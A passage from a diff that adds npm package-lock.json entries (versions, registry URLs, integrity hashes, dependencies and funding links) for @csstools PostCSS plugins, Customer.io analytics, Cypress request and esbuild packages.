"https://registry.npmjs.org/@csstools/css-color-parser/-/css-color-parser-1.4.0.tgz", + "integrity": "sha512-SlGd8E6ron24JYQPQAIzu5tvmWi1H4sDKTdA7UDnwF45oJv7AVESbOlOO1YjfBhrQFuvLWUgKiOY9DwGoAxwTA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/color-helpers": "^3.0.2", + "@csstools/css-calc": "^1.1.4" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "@csstools/css-parser-algorithms": "^2.3.2", + "@csstools/css-tokenizer": "^2.2.1" + } + }, + "node_modules/@csstools/css-parser-algorithms": { + "version": "2.6.1", + "resolved": "https://registry.npmjs.org/@csstools/css-parser-algorithms/-/css-parser-algorithms-2.6.1.tgz", + "integrity": "sha512-ubEkAaTfVZa+WwGhs5jbo5Xfqpeaybr/RvWzvFxRs4jfq16wH8l8Ty/QEEpINxll4xhuGfdMbipRyz5QZh9+FA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "@csstools/css-tokenizer": "^2.2.4" + } + }, + "node_modules/@csstools/css-tokenizer": { + "version": "2.2.4", + "resolved": "https://registry.npmjs.org/@csstools/css-tokenizer/-/css-tokenizer-2.2.4.tgz", + "integrity": "sha512-PuWRAewQLbDhGeTvFuq2oClaSCKPIBmHyIobCV39JHRYN0byDcUWJl5baPeNUcqrjtdMNqFooE0FGl31I3JOqw==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "engines": { + "node": "^14 || ^16 || >=18" + } + }, + "node_modules/@csstools/media-query-list-parser": { + "version": "2.1.9", + "resolved": "https://registry.npmjs.org/@csstools/media-query-list-parser/-/media-query-list-parser-2.1.9.tgz", + "integrity": "sha512-qqGuFfbn4rUmyOB0u8CVISIp5FfJ5GAR3mBrZ9/TKndHakdnm6pY0L/fbLcpPnrzwCyyTEZl1nUcXAYHEWneTA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "@csstools/css-parser-algorithms": "^2.6.1", + "@csstools/css-tokenizer": "^2.2.4" + } + }, + "node_modules/@csstools/postcss-cascade-layers": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/@csstools/postcss-cascade-layers/-/postcss-cascade-layers-3.0.1.tgz", + "integrity": "sha512-dD8W98dOYNOH/yX4V4HXOhfCOnvVAg8TtsL+qCGNoKXuq5z2C/d026wGWgySgC8cajXXo/wNezS31Glj5GcqrA==", + "dev": true, + "dependencies": { + "@csstools/selector-specificity": "^2.0.2", + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-color-function": { + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/@csstools/postcss-color-function/-/postcss-color-function-2.2.3.tgz", + "integrity": "sha512-b1ptNkr1UWP96EEHqKBWWaV5m/0hgYGctgA/RVZhONeP1L3T/8hwoqDm9bB23yVCfOgE9U93KI9j06+pEkJTvw==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/css-color-parser": "^1.2.0", + "@csstools/css-parser-algorithms": "^2.1.1", + "@csstools/css-tokenizer": "^2.1.1", + "@csstools/postcss-progressive-custom-properties": "^2.3.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-color-mix-function": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/@csstools/postcss-color-mix-function/-/postcss-color-mix-function-1.0.3.tgz", + "integrity": "sha512-QGXjGugTluqFZWzVf+S3wCiRiI0ukXlYqCi7OnpDotP/zaVTyl/aqZujLFzTOXy24BoWnu89frGMc79ohY5eog==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/css-color-parser": "^1.2.0", + "@csstools/css-parser-algorithms": "^2.1.1", + "@csstools/css-tokenizer": "^2.1.1", + "@csstools/postcss-progressive-custom-properties": "^2.3.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-font-format-keywords": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/@csstools/postcss-font-format-keywords/-/postcss-font-format-keywords-2.0.2.tgz", + "integrity": "sha512-iKYZlIs6JsNT7NKyRjyIyezTCHLh4L4BBB3F5Nx7Dc4Z/QmBgX+YJFuUSar8IM6KclGiAUFGomXFdYxAwJydlA==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-gradients-interpolation-method": { + "version": "3.0.6", + "resolved": "https://registry.npmjs.org/@csstools/postcss-gradients-interpolation-method/-/postcss-gradients-interpolation-method-3.0.6.tgz", + "integrity": "sha512-rBOBTat/YMmB0G8VHwKqDEx+RZ4KCU9j42K8LwS0IpZnyThalZZF7BCSsZ6TFlZhcRZKlZy3LLFI2pLqjNVGGA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/css-color-parser": "^1.2.0", + "@csstools/css-parser-algorithms": "^2.1.1", + "@csstools/css-tokenizer": "^2.1.1", + "@csstools/postcss-progressive-custom-properties": "^2.3.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-hwb-function": { + "version": "2.2.2", + "resolved": "https://registry.npmjs.org/@csstools/postcss-hwb-function/-/postcss-hwb-function-2.2.2.tgz", + "integrity": "sha512-W5Y5oaJ382HSlbdGfPf60d7dAK6Hqf10+Be1yZbd/TNNrQ/3dDdV1c07YwOXPQ3PZ6dvFMhxbIbn8EC3ki3nEg==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/css-color-parser": "^1.2.0", + "@csstools/css-parser-algorithms": "^2.1.1", + "@csstools/css-tokenizer": "^2.1.1" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-ic-unit": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/@csstools/postcss-ic-unit/-/postcss-ic-unit-2.0.4.tgz", + "integrity": "sha512-9W2ZbV7whWnr1Gt4qYgxMWzbevZMOvclUczT5vk4yR6vS53W/njiiUhtm/jh/BKYwQ1W3PECZjgAd2dH4ebJig==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/postcss-progressive-custom-properties": "^2.3.0", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-is-pseudo-class": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/@csstools/postcss-is-pseudo-class/-/postcss-is-pseudo-class-3.2.1.tgz", + "integrity": "sha512-AtANdV34kJl04Al62is3eQRk/BfOfyAvEmRJvbt+nx5REqImLC+2XhuE6skgkcPli1l8ONS67wS+l1sBzySc3Q==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/selector-specificity": "^2.0.0", + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-logical-float-and-clear": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/@csstools/postcss-logical-float-and-clear/-/postcss-logical-float-and-clear-1.0.1.tgz", + "integrity": "sha512-eO9z2sMLddvlfFEW5Fxbjyd03zaO7cJafDurK4rCqyRt9P7aaWwha0LcSzoROlcZrw1NBV2JAp2vMKfPMQO1xw==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-logical-resize": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/@csstools/postcss-logical-resize/-/postcss-logical-resize-1.0.1.tgz", + "integrity": "sha512-x1ge74eCSvpBkDDWppl+7FuD2dL68WP+wwP2qvdUcKY17vJksz+XoE1ZRV38uJgS6FNUwC0AxrPW5gy3MxsDHQ==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-logical-viewport-units": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/@csstools/postcss-logical-viewport-units/-/postcss-logical-viewport-units-1.0.3.tgz", + "integrity": "sha512-6zqcyRg9HSqIHIPMYdt6THWhRmE5/tyHKJQLysn2TeDf/ftq7Em9qwMTx98t2C/7UxIsYS8lOiHHxAVjWn2WUg==", + "dev": true, + "dependencies": { + "@csstools/css-tokenizer": "^2.1.1" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-media-minmax": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@csstools/postcss-media-minmax/-/postcss-media-minmax-1.1.0.tgz", + "integrity": "sha512-t5Li/DPC5QmW/6VFLfUvsw/4dNYYseWR0tOXDeJg/9EKUodBgNawz5tuk5vYKtNvoj+Q08odMuXcpS5YJj0AFA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/css-calc": "^1.1.4", + "@csstools/css-parser-algorithms": "^2.3.2", + "@csstools/css-tokenizer": "^2.2.1", + "@csstools/media-query-list-parser": "^2.1.5" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-media-queries-aspect-ratio-number-values": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/@csstools/postcss-media-queries-aspect-ratio-number-values/-/postcss-media-queries-aspect-ratio-number-values-1.0.4.tgz", + "integrity": "sha512-IwyTbyR8E2y3kh6Fhrs251KjKBJeUPV5GlnUKnpU70PRFEN2DolWbf2V4+o/B9+Oj77P/DullLTulWEQ8uFtAA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/css-parser-algorithms": "^2.2.0", + "@csstools/css-tokenizer": "^2.1.1", + "@csstools/media-query-list-parser": "^2.1.1" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-nested-calc": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/@csstools/postcss-nested-calc/-/postcss-nested-calc-2.0.2.tgz", + "integrity": "sha512-jbwrP8rN4e7LNaRcpx3xpMUjhtt34I9OV+zgbcsYAAk6k1+3kODXJBf95/JMYWhu9g1oif7r06QVUgfWsKxCFw==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-normalize-display-values": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/@csstools/postcss-normalize-display-values/-/postcss-normalize-display-values-2.0.1.tgz", + "integrity": "sha512-TQT5g3JQ5gPXC239YuRK8jFceXF9d25ZvBkyjzBGGoW5st5sPXFVQS8OjYb9IJ/K3CdfK4528y483cgS2DJR/w==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-oklab-function": { + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/@csstools/postcss-oklab-function/-/postcss-oklab-function-2.2.3.tgz", + "integrity": "sha512-AgJ2rWMnLCDcbSMTHSqBYn66DNLBym6JpBpCaqmwZ9huGdljjDRuH3DzOYzkgQ7Pm2K92IYIq54IvFHloUOdvA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/css-color-parser": "^1.2.0", + "@csstools/css-parser-algorithms": "^2.1.1", + "@csstools/css-tokenizer": "^2.1.1", + "@csstools/postcss-progressive-custom-properties": "^2.3.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-progressive-custom-properties": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/@csstools/postcss-progressive-custom-properties/-/postcss-progressive-custom-properties-2.3.0.tgz", + "integrity": "sha512-Zd8ojyMlsL919TBExQ1I0CTpBDdyCpH/yOdqatZpuC3sd22K4SwC7+Yez3Q/vmXMWSAl+shjNeFZ7JMyxMjK+Q==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-relative-color-syntax": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@csstools/postcss-relative-color-syntax/-/postcss-relative-color-syntax-1.0.2.tgz", + "integrity": "sha512-juCoVInkgH2TZPfOhyx6tIal7jW37L/0Tt+Vcl1LoxqQA9sxcg3JWYZ98pl1BonDnki6s/M7nXzFQHWsWMeHgw==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/css-color-parser": "^1.2.0", + "@csstools/css-parser-algorithms": "^2.1.1", + "@csstools/css-tokenizer": "^2.1.1", + "@csstools/postcss-progressive-custom-properties": "^2.3.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-scope-pseudo-class": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/@csstools/postcss-scope-pseudo-class/-/postcss-scope-pseudo-class-2.0.2.tgz", + "integrity": "sha512-6Pvo4uexUCXt+Hz5iUtemQAcIuCYnL+ePs1khFR6/xPgC92aQLJ0zGHonWoewiBE+I++4gXK3pr+R1rlOFHe5w==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-stepped-value-functions": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/@csstools/postcss-stepped-value-functions/-/postcss-stepped-value-functions-2.1.1.tgz", + "integrity": "sha512-YCvdF0GCZK35nhLgs7ippcxDlRVe5QsSht3+EghqTjnYnyl3BbWIN6fYQ1dKWYTJ+7Bgi41TgqQFfJDcp9Xy/w==", + "dev": true, + "dependencies": { + "@csstools/css-calc": "^1.1.1", + "@csstools/css-parser-algorithms": "^2.1.1", + "@csstools/css-tokenizer": "^2.1.1" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-text-decoration-shorthand": { + "version": "2.2.4", + "resolved": "https://registry.npmjs.org/@csstools/postcss-text-decoration-shorthand/-/postcss-text-decoration-shorthand-2.2.4.tgz", + "integrity": "sha512-zPN56sQkS/7YTCVZhOBVCWf7AiNge8fXDl7JVaHLz2RyT4pnyK2gFjckWRLpO0A2xkm1lCgZ0bepYZTwAVd/5A==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/color-helpers": "^2.1.0", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-text-decoration-shorthand/node_modules/@csstools/color-helpers": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@csstools/color-helpers/-/color-helpers-2.1.0.tgz", + "integrity": "sha512-OWkqBa7PDzZuJ3Ha7T5bxdSVfSCfTq6K1mbAhbO1MD+GSULGjrp45i5RudyJOedstSarN/3mdwu9upJE7gDXfw==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "engines": { + "node": "^14 || ^16 || >=18" + } + }, + "node_modules/@csstools/postcss-trigonometric-functions": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/@csstools/postcss-trigonometric-functions/-/postcss-trigonometric-functions-2.1.1.tgz", + "integrity": "sha512-XcXmHEFfHXhvYz40FtDlA4Fp4NQln2bWTsCwthd2c+MCnYArUYU3YaMqzR5CrKP3pMoGYTBnp5fMqf1HxItNyw==", + "dev": true, + "dependencies": { + "@csstools/css-calc": "^1.1.1", + "@csstools/css-parser-algorithms": "^2.1.1", + "@csstools/css-tokenizer": "^2.1.1" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-unset-value": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/@csstools/postcss-unset-value/-/postcss-unset-value-2.0.1.tgz", + "integrity": "sha512-oJ9Xl29/yU8U7/pnMJRqAZd4YXNCfGEdcP4ywREuqm/xMqcgDNDppYRoCGDt40aaZQIEKBS79LytUDN/DHf0Ew==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/selector-specificity": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/@csstools/selector-specificity/-/selector-specificity-2.2.0.tgz", + "integrity": "sha512-+OJ9konv95ClSTOJCmMZqpd5+YGsB2S+x6w3E1oaM8UuR5j8nTNHYSz8c9BEPGDOCMQYIEEGlVPj/VY64iTbGw==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss-selector-parser": "^6.0.10" + } + }, + "node_modules/@customerio/cdp-analytics-core": { + "version": "0.3.0", + "resolved": "https://registry.npmjs.org/@customerio/cdp-analytics-core/-/cdp-analytics-core-0.3.0.tgz", + "integrity": "sha512-5BJ8VgUkLT2YuDZ7Dr+oWnpFNObF5tgfj1hU/E01+kxUAvzUoOiLNL6NjKy9AeZYIFuzqgzYCfmR/1mGYdngsw==", + "license": "MIT", + "dependencies": { + "@lukeed/uuid": "^2.0.0", + "dset": "^3.1.2", + "tslib": "^2.4.1" + } + }, + "node_modules/@customerio/cdp-analytics-node": { + "version": "0.3.0", + "resolved": "https://registry.npmjs.org/@customerio/cdp-analytics-node/-/cdp-analytics-node-0.3.0.tgz", + "integrity": "sha512-p8WCtj+O3JoOooaFeENQzGPD8SDJ8x7z3P6s6xHtIaxsYjPFVfFVRV1avJQb3YTA+Z4Ak5h1oK/zayTIBJA6pQ==", + "dependencies": { + "@customerio/cdp-analytics-core": "0.3.0", + "@lukeed/uuid": "^2.0.0", + "buffer": "^6.0.3", + "node-fetch": "^2.6.7", + "tslib": "^2.4.1", + "uuid": "^9.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@customerio/cdp-analytics-node/node_modules/buffer": { + "version": "6.0.3", + "resolved": "https://registry.npmjs.org/buffer/-/buffer-6.0.3.tgz", + "integrity": "sha512-FTiCpNxtwiZZHEZbcbTIcZjERVICn9yq/pDFkTl95/AxzD1naBctN7YO68riM/gLSDY7sdrMby8hofADYuuqOA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "license": "MIT", + "dependencies": { + "base64-js": "^1.3.1", + "ieee754": "^1.2.1" + } + }, + "node_modules/@customerio/cdp-analytics-node/node_modules/ieee754": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.2.1.tgz", + "integrity": "sha512-dcyqhDvX1C46lXZcVqCpK+FtMRQVdIMN6/Df5js2zouUsqG7I6sFxitIC+7KYK29KdXOLHdu9zL4sFnoVQnqaA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "license": "BSD-3-Clause" + }, + "node_modules/@customerio/cdp-analytics-node/node_modules/uuid": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", + "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", + "funding": [ + "https://github.com/sponsors/broofa", + "https://github.com/sponsors/ctavan" + ], + "license": "MIT", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@cypress/request": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/@cypress/request/-/request-3.0.1.tgz", + "integrity": "sha512-TWivJlJi8ZDx2wGOw1dbLuHJKUYX7bWySw377nlnGOW3hP9/MUKIsEdXT/YngWxVdgNCHRBmFlBipE+5/2ZZlQ==", + "dev": true, + "dependencies": { + "aws-sign2": "~0.7.0", + "aws4": "^1.8.0", + "caseless": "~0.12.0", + "combined-stream": "~1.0.6", + "extend": "~3.0.2", + "forever-agent": "~0.6.1", + "form-data": "~2.3.2", + "http-signature": "~1.3.6", + "is-typedarray": "~1.0.0", + "isstream": "~0.1.2", + "json-stringify-safe": "~5.0.1", + "mime-types": "~2.1.19", + "performance-now": "^2.1.0", + "qs": "6.10.4", + "safe-buffer": "^5.1.2", + "tough-cookie": "^4.1.3", + "tunnel-agent": "^0.6.0", + "uuid": "^8.3.2" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/@cypress/request/node_modules/assert-plus": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", + "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", + "dev": true, + "engines": { + "node": ">=0.8" + } + }, + "node_modules/@cypress/request/node_modules/form-data": { + "version": "2.3.3", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", + "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", + "dev": true, + "dependencies": { + "asynckit": "^0.4.0", + "combined-stream": "^1.0.6", + "mime-types": "^2.1.12" + }, + "engines": { + "node": ">= 0.12" + } + }, + "node_modules/@cypress/request/node_modules/http-signature": { + "version": "1.3.6", + "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.3.6.tgz", + "integrity": "sha512-3adrsD6zqo4GsTqtO7FyrejHNv+NgiIfAfv68+jVlFmSr9OGy7zrxONceFRLKvnnZA5jbxQBX1u9PpB6Wi32Gw==", + "dev": true, + "dependencies": { + "assert-plus": "^1.0.0", + "jsprim": "^2.0.2", + "sshpk": "^1.14.1" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/@cypress/request/node_modules/jsprim": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-2.0.2.tgz", + "integrity": "sha512-gqXddjPqQ6G40VdnI6T6yObEC+pDNvyP95wdQhkWkg7crHH3km5qP1FsOXEkzEQwnz6gz5qGTn1c2Y52wP3OyQ==", + "dev": true, + "engines": [ + "node >=0.6.0" + ], + "dependencies": { + "assert-plus": "1.0.0", + "extsprintf": "1.3.0", + "json-schema": "0.4.0", + "verror": "1.10.0" + } + }, + "node_modules/@cypress/request/node_modules/qs": { + "version": "6.10.4", + "resolved": "https://registry.npmjs.org/qs/-/qs-6.10.4.tgz", + "integrity": "sha512-OQiU+C+Ds5qiH91qh/mg0w+8nwQuLjM4F4M/PbmhDOoYehPh+Fb0bDjtR1sOvy7YKxvj28Y/M0PhP5uVX0kB+g==", + "dev": true, + "dependencies": { + "side-channel": "^1.0.4" + }, + "engines": { + "node": ">=0.6" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/@cypress/request/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "dev": true, + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@cypress/xvfb": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/@cypress/xvfb/-/xvfb-1.2.4.tgz", + "integrity": "sha512-skbBzPggOVYCbnGgV+0dmBdW/s77ZkAOXIC1knS8NagwDjBrNC1LuXtQJeiN6l+m7lzmHtaoUw/ctJKdqkG57Q==", + "dev": true, + "dependencies": { + "debug": "^3.1.0", + "lodash.once": "^4.1.1" + } + }, + "node_modules/@cypress/xvfb/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "dev": true, + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/@discoveryjs/json-ext": { + "version": "0.5.7", + "resolved": "https://registry.npmjs.org/@discoveryjs/json-ext/-/json-ext-0.5.7.tgz", + "integrity": "sha512-dBVuXR082gk3jsFp7Rd/JI4kytwGHecnCoTtXFb7DB6CNHp4rg5k1bhg0nWdLGLnOV71lmDzGQaLMy8iPLY0pw==", + "dev": true, + "engines": { + "node": ">=10.0.0" + } + }, + "node_modules/@dual-bundle/import-meta-resolve": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/@dual-bundle/import-meta-resolve/-/import-meta-resolve-4.0.0.tgz", + "integrity": "sha512-ZKXyJeFAzcpKM2kk8ipoGIPUqx9BX52omTGnfwjJvxOCaZTM2wtDK7zN0aIgPRbT9XYAlha0HtmZ+XKteuh0Gw==", + "dev": true, + "peer": true, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/wooorm" + } + }, + "node_modules/@esbuild/aix-ppc64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/aix-ppc64/-/aix-ppc64-0.25.0.tgz", + "integrity": "sha512-O7vun9Sf8DFjH2UtqK8Ku3LkquL9SZL8OLY1T5NZkA34+wG3OQF7cl4Ql8vdNzM6fzBbYfLaiRLIOZ+2FOCgBQ==", + "cpu": [ + "ppc64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "aix" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/android-arm": { + "version": "0.25.0", + 